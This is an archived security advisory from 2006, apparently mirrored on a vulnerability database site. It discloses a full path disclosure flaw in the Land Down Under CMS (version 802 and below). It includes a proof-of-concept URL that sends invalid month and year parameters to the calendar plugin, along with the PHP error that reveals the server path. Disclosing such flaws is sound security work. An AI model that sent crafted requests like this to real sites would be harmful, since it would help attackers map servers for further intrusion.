Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12455
HistoryApr 28, 2006 - 12:00 a.m.

Land Down Under 802 and below version Path Disclosure Vulnerability

2006-04-2800:00:00
vulners.com
12
JSON

Land Down Under 802 and below version Path Disclosure Vulnerability

#-------------------------------------------------------------------------------------------------------------------------------
#Aria-Security.net Advisory
#Discovered by:R@1D3N (amin emami)
#date:21/04/2006
#original advisory:http://www.aria-security.net/advisory/ldu/ldu.txt
#<[email protected]>
#special thanks to:A.u.r.a & O.u.t.l.a.w & Smok3r & behzad & majid and all Persian Security team
#--------------------------------------------------------------------------------------------------------------------------------'

? Affected software description:
LDU <= 802 and below version (Land Down Under)
Vendor: http://www.neocrome.net

? information:
A vulnerability in LDU allow attackers to determine the physical path of the application.
This vulnerability would allow a remote user to determine the full path to the web root directory and other potentially sensitive information.

The attack is performed by submitting a specially crafted HTTP request, such as a request for an invalid month and year

? Proof of Concept:

Path disclosure vulnerability:
http://localhost/plug.php?p=calendar&amp;m=aria-security.net&amp;y=R@1D3N

error:
warning:checkdate() expects parameter 1 to be long
,string given in /home/lothi8196/public_html/plugins/standard/calendar/calendar.php
on line 100

Solution:
There is no solution to the full path disclosure yet.
[email protected]

JSON